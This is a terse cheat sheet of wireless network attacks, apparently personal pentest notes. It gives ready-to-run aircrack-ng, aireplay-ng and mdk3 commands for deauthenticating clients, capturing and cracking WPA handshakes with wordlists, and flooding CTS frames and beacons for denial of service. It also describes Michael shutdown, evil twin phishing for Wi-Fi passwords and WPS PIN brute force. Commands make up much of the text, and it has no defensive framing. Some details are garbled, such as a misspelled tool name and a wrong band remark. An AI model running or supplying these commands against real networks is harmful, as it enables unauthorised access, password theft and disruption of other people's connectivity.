sudo airmon-ng check kill
sudo airmon-ng
sudo airmon-ng start wlan0
# Change MAC
ifconfig wlan0mon down
macchanger -s wlan0mon
ifconfig wlan0mon up
To restart network services:
sudo airmon-ng stop wlan1mon
sudo service NetworkManager restart
Start capturing:
# 802.11.g is for 5GHz if you don't have the suitable hardwarte try to use --band ab
sudo airodump-ng -c <CH> --bssid <BSSID> [--band abg] --write <OUT_FILE> <IFACE>
Handshake Capture (Clients needed)
Deauth
Consist on deauthenticate a client in order to capture de re-authentication handshake.
aireplay-ng -0 10 -a <BSSID> -c <CLIENT> <IFACE>
Deauth Global
The same term of deauthentication, but in that case using the brodcast MAC address in order to deauthenticate all clients.
Could be sound strange, but if you authenticate 5000 clients to the Access Point is possible to kick out client of the network and then capture their handshake.
mdk3 <IFACE> a -a <BSSID> #Authenticating clients until DoS
Finally the AP will eject the clients with less power rate.
Dissassociation Amok Mode Attack
Same as deauthentication attack but mdk3 gives us the opportunity to introduce allow/deny lists.
blacklist.txt:
a0:e4:b2:45:f6:87
mdk3 <IFACE> d -w blacklist.txt -c 1
Validating the handshake
Sometimes aircrack-ng tells us that it capture a handshake when it hasn't. So we can validate it with pyrit.
pyrit -r Capture-01.cap analyze
Filtering the capture
When we are trying to capture a handshake, maybe we are capturing a lot of packets, so we just need to filter that. (EAPOL -> Handshakes) (wlan.fc.type_subtype==0x08 are Beacons) (wlan.fc.type_subtype==0x05 are Probe Response)
With airolib we can create a dictionary with PMKS.
airolig-ng passwords-airolib --import passwd /usr/share/wordlists/rockyou.txt
echo "<ESSID>" > essid.lst
airolib-ng passwords-airolib --import essid essid.lst
airolib-ng passwords-airolib --stats #Test if all is working correctly
airolib-ng passwords-airolib --clean all #Clean the wordlists to ileggible characters
airolib-ng passwords-airolib --batch #Create the wordlists
Onced created we just need to use aircrack
aircrack-ng -r passwords-airolib_Capture-01.cap
We can see that the speed of cracking of aircrack-ng goes from 10k/s up to 200k/s.
The protocol 802.11 is CSMA CA, CA is Collision Avoidance, so in that protocol appear two new types of packets. CTS (Clear to Send) and RTS (Request to Send) that provides to the network the ability to avoid collisions between frames.
What happens if we flood the network with 1000 CTS frames with the time field on his maximum value (30.000 us), if we flood with that TCP stream we will hijack all the bandwidth causing a Denial of Service.
First we need to capture and modify one Clear-to-send frame and modify the Duration to 30.000 us and modify the RA address.
Onced created out evil frame we just need to send several times to the network.
The beacon frame is a frame that contains information about the access point such as the channel where the AP is working, ciphers, protocols, etc.
These type of beacons are transmitted in plain as other stations and devices need these frames to extract information in order to connect them.
The idea of Beacon Flood Attack such as his name says, flood a large number of beacons in order to create a lot of ESSID in the same Chanel as the target AP in order to make it invisible for users.
# Create a list of AP names:
MyNetwork1
MyNetwork2
MyNetwork3
MyNetwork4
MyNetwork5
MyNetwork6
MyNetwork7
MyNetwork8
MyNetwork9
MyNetwork10
mdk3 <IFACE> b -f networks.txt -a -s 1000 -c <CHANNEL> # -a -> WPA2 -s <speed>
Michael Shutdown Explotation
Can shut down APs using TKIP encryption and QoS Extension with 1 sniffed and 2 injected QoS Data Packets, but less effective.
mdk3 <IFACE> m -t <BSSID>
Evil Twin
One of the most common techniques to obtain the password of a wireless network via phishing. It's common that the devices emit Probe Request frames when their are not associated to any AP. These Probe Request frame ares packets that contain information about which SSID the device was connected before. So we can abuse of that information in order to create a Fake AP with the same SSID.
Wifi Protected Setup aka WPS is a wireless network security standard that tries to make connections between a router and devices faster and easier.
WPSPinGenerator is an automatic tool available in Wifislax.
First we need to choose the interface to work with and the channels where we want to listen. We can see the generic PINS if they are available on the network by selection the suitable SSID.
Finally we just need to test the PIN and wait for success. Noticed that after 3 fail attempts the WPS could lock.